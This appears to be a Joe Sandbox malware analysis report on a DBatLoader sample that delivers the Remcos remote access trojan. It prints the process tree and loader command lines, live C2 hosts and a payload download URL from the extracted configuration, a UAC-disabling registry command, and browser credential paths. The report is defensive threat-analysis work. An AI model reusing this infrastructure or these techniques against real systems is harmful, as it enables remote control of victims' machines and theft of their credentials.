Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
AWkpqJMxci.exe

Overview

General Information

Sample name:AWkpqJMxci.exe
renamed because original name is a hash value
Original sample name:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62.exe
Analysis ID:1562870
MD5:b4e2055b4877dcfcbf9a366106b15591
SHA1:459f7b89e83d5be3581029dca3bb32d4c97d8156
SHA256:096394b733ca53e65afa06302776c52330f2567d665a42e0c5463fe23c523e62
Tags:doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • AWkpqJMxci.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\AWkpqJMxci.exe" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • cmd.exe (PID: 1076 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 2128 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 2056 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • alpha.pif (PID: 5960 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1376 cmdline: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 1352 cmdline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • xpha.pif (PID: 5304 cmdline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10 MD5: B3624DD758CCECF93A1226CEF252CA12)
      • alpha.pif (PID: 4228 cmdline: C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 6676 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • alpha.pif (PID: 5164 cmdline: C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
    • esentutl.exe (PID: 4180 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\AWkpqJMxci.exe /d C:\\Users\\Public\\Libraries\\Bzaszylr.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 4228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 7124 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • Bzaszylr.PIF (PID: 6680 cmdline: "C:\Users\Public\Libraries\Bzaszylr.PIF" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • SndVol.exe (PID: 5764 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Bzaszylr.PIF (PID: 6576 cmdline: "C:\Users\Public\Libraries\Bzaszylr.PIF" MD5: B4E2055B4877DCFCBF9A366106B15591)
    • colorcpl.exe (PID: 4476 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0"]}

Threatname: Remcos

{"Host:Port:Password": ["ogcmaw.duckdns.org:2404:0", "emberluck.duckdns.org:2500:0"], "Assigned name": "Ember Luck", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SKG82E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 31 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.colorcpl.exe.670191b.2.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              8.2.colorcpl.exe.670191b.2.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                8.2.colorcpl.exe.670191b.2.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  8.2.colorcpl.exe.670191b.2.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6aab8:$a1: Remcos restarted by watchdog!
                  • 0x6b030:$a3: %02i:%02i:%02i:%03i
                  8.2.colorcpl.exe.670191b.2.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x64b0c:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x64a88:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64a88:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x64f88:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x657b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x64b7c:$str_b2: Executing file:
                  • 0x65bfc:$str_b3: GetDirectListeningPort
                  • 0x655a8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x65728:$str_b7: \update.vbs
                  • 0x64ba4:$str_b9: Downloaded file:
                  • 0x64b90:$str_b10: Downloading file:
                  • 0x64c34:$str_b12: Failed to upload file:
                  • 0x65bc4:$str_b13: StartForward
                  • 0x65be4:$str_b14: StopForward
                  • 0x65680:$str_b15: fso.DeleteFile "
                  • 0x65614:$str_b16: On Error Resume Next
                  • 0x656b0:$str_b17: fso.DeleteFolder "
                  • 0x64c24:$str_b18: Uploaded file:
                  • 0x64be4:$str_b19: Unable to delete:
                  • 0x65648:$str_b20: while fso.FileExists("
                  • 0x650c1:$str_c0: [Firefox StoredLogins not found]
                  Click to see the 69 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1076, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 5960, ProcessName: alpha.pif
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Bzaszylr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bzaszylr
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Bzaszylr.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\AWkpqJMxci.exe, ProcessId: 6608, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Bzaszylr
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , CommandLine|base64offset|contains: , Image: C:\Users\Public\alpha.pif, NewProcessName: C:\Users\Public\alpha.pif, OriginalFileName: C:\Users\Public\alpha.pif, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\rlyzsazB.cmd" ", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1076, ParentProcessName: cmd.exe, ProcessCommandLine: C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows " , ProcessId: 5960, ProcessName: alpha.pif

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: Registry Key setAuthor: Joe Security: Data: Details: 0A 55 C7 CC 7A 15 D8 19 31 D4 C6 D2 DA DE 06 22 43 AA F3 15 99 78 D1 91 9E B9 97 A8 45 23 8F E0 6A 64 70 0B 7F 79 00 92 BA F2 E0 03 F6 4E 5B 8E 53 C3 7F 0C AD 5A 8F 79 E5 B2 82 D6 A0 CB A4 73 60 CD , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 7124, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-SKG82E\exepath

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T08:24:03.271330+010020283713Unknown Traffic192.168.2.449731142.250.181.33443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-26T08:24:12.618349+010020327761Malware Command and Control Activity Detected192.168.2.449732162.216.243.152404TCP
                  2024-11-26T08:24:15.182174+010020327761Malware Command and Control Activity Detected192.168.2.449733192.169.69.262500TCP
                  2024-11-26T08:24:27.160184+010020327761Malware Command and Control Activity Detected192.168.2.449740162.216.243.152404TCP
                  2024-11-26T08:24:29.405914+010020327761Malware Command and Control Activity Detected192.168.2.449741192.169.69.262500TCP
                  2024-11-26T08:24:41.026788+010020327761Malware Command and Control Activity Detected192.168.2.449742162.216.243.152404TCP
                  2024-11-26T08:24:43.259234+010020327761Malware Command and Control Activity Detected192.168.2.449743192.169.69.262500TCP
                  2024-11-26T08:24:54.918541+010020327761Malware Command and Control Activity Detected192.168.2.449744162.216.243.152404TCP
                  2024-11-26T08:24:57.172177+010020327761Malware Command and Control Activity Detected192.168.2.449745192.169.69.262500TCP
                  2024-11-26T08:25:08.776100+010020327761Malware Command and Control Activity Detected192.168.2.449763162.216.243.152404TCP
                  2024-11-26T08:25:11.009478+010020327761Malware Command and Control Activity Detected192.168.2.449769192.169.69.262500TCP
                  2024-11-26T08:25:23.036101+010020327761Malware Command and Control Activity Detected192.168.2.449800162.216.243.152404TCP
                  2024-11-26T08:25:25.636529+010020327761Malware Command and Control Activity Detected192.168.2.449806192.169.69.262500TCP
                  2024-11-26T08:25:37.386560+010020327761Malware Command and Control Activity Detected192.168.2.449831162.216.243.152404TCP
                  2024-11-26T08:25:39.625415+010020327761Malware Command and Control Activity Detected192.168.2.449837192.169.69.262500TCP
                  2024-11-26T08:25:51.267856+010020327761Malware Command and Control Activity Detected192.168.2.449862162.216.243.152404TCP
                  2024-11-26T08:25:53.502242+010020327761Malware Command and Control Activity Detected192.168.2.449868192.169.69.262500TCP
                  2024-11-26T08:26:05.104315+010020327761Malware Command and Control Activity Detected192.168.2.449894162.216.243.152404TCP
                  2024-11-26T08:26:07.313945+010020327761Malware Command and Control Activity Detected192.168.2.449900192.169.69.262500TCP
                  2024-11-26T08:26:19.010690+010020327761Malware Command and Control Activity Detected192.168.2.449927162.216.243.152404TCP
                  2024-11-26T08:26:21.204631+010020327761Malware Command and Control Activity Detected192.168.2.449933192.169.69.262500TCP
                  2024-11-26T08:26:33.321104+010020327761Malware Command and Control Activity Detected192.168.2.449961162.216.243.152404TCP
                  2024-11-26T08:26:35.870577+010020327761Malware Command and Control Activity Detected192.168.2.449967192.169.69.262500TCP
                  2024-11-26T08:26:47.667527+010020327761Malware Command and Control Activity Detected192.168.2.449994162.216.243.152404TCP
                  2024-11-26T08:26:49.949304+010020327761Malware Command and Control Activity Detected192.168.2.450001192.169.69.262500TCP
                  2024-11-26T08:27:01.572309+010020327761Malware Command and Control Activity Detected192.168.2.450027162.216.243.152404TCP
                  2024-11-26T08:27:03.796690+010020327761Malware Command and Control Activity Detected192.168.2.450029192.169.69.262500TCP
                  2024-11-26T08:27:15.546500+010020327761Malware Command and Control Activity Detected192.168.2.450030162.216.243.152404TCP
                  2024-11-26T08:27:17.753208+010020327761Malware Command and Control Activity Detected192.168.2.450031192.169.69.262500TCP
                  2024-11-26T08:27:29.527066+010020327761Malware Command and Control Activity Detected192.168.2.450032162.216.243.152404TCP
                  2024-11-26T08:27:31.809755+010020327761Malware Command and Control Activity Detected192.168.2.450033192.169.69.262500TCP
                  2024-11-26T08:27:43.782138+010020327761Malware Command and Control Activity Detected192.168.2.450034162.216.243.152404TCP
                  2024-11-26T08:27:46.398618+010020327761Malware Command and Control Activity Detected192.168.2.450035192.169.69.262500TCP
                  2024-11-26T08:27:58.104667+010020327761Malware Command and Control Activity Detected192.168.2.450036162.216.243.152404TCP
                  2024-11-26T08:28:00.316675+010020327761Malware Command and Control Activity Detected192.168.2.450037192.169.69.262500TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: AWkpqJMxci.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFAvira: detection malicious, Label: TR/AD.Nekark.gwqnm
                  Found malware configuration
                  Source: AWkpqJMxci.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://drive.usercontent.google.com/download?id=1K_zVl3JVaxBaP1lXOhZSCueAU9P7Lpb0"]}
                  Source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["ogcmaw.duckdns.org:2404:0", "emberluck.duckdns.org:2500:0"], "Assigned name": "Ember Luck", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-SKG82E", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFReversingLabs: Detection: 71%
                  Multi AV Scanner detection for submitted file
                  Source: AWkpqJMxci.exeReversingLabs: Detection: 71%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000003.1910126332.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.00000000027BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911052257.000000000308E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4115847065.0000000002780000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 94.5% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\Public\Libraries\Bzaszylr.PIFJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: AWkpqJMxci.exeJoe Sandbox ML: detected
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_046938C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,8_2_046938C8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_004338C8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_051545E3 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_051545E3
                  Source: colorcpl.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.512191b.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.SndVol.exe.5120000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.6700000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.colorcpl.exe.670191b.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.4116392434.0000000006700000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1910497992.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.4116150269.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.1911787630.0000000005120000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 7124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 5764, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_04667538 _wcslen,CoGetObject,8_2_04667538
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 17_2_00407538 _wcslen,CoGetObject,17_2_00407538
                  Source: AWkpqJMxci.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                  Source: unknownHTTPS traffic detected: 142.250.181.33:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: AWkpqJMxci.exe, AWkpqJMxci.exe, 00000000.00000003.1666597559.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1803873997.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D605000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1747775109.000000007EB60000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782458415.000000000238F000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1782985110.00000000028AE000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000002.1789189761.000000000D5CA000.00000004.00001000.00020000.00000000.sdmp, AWkpqJMxci.exe, 00000000.00000003.1748003112.000000007FCA0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1762893892.0000000000AA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif, 00000005.00000000.1769159470.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 00000009.00000000.1774119719.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000A.00000000.1777848027.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000D.00000000.1873419118.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000E.00000002.1875239143.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif, 0000000F.00000002.1876616016.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, alpha.pif.3.dr
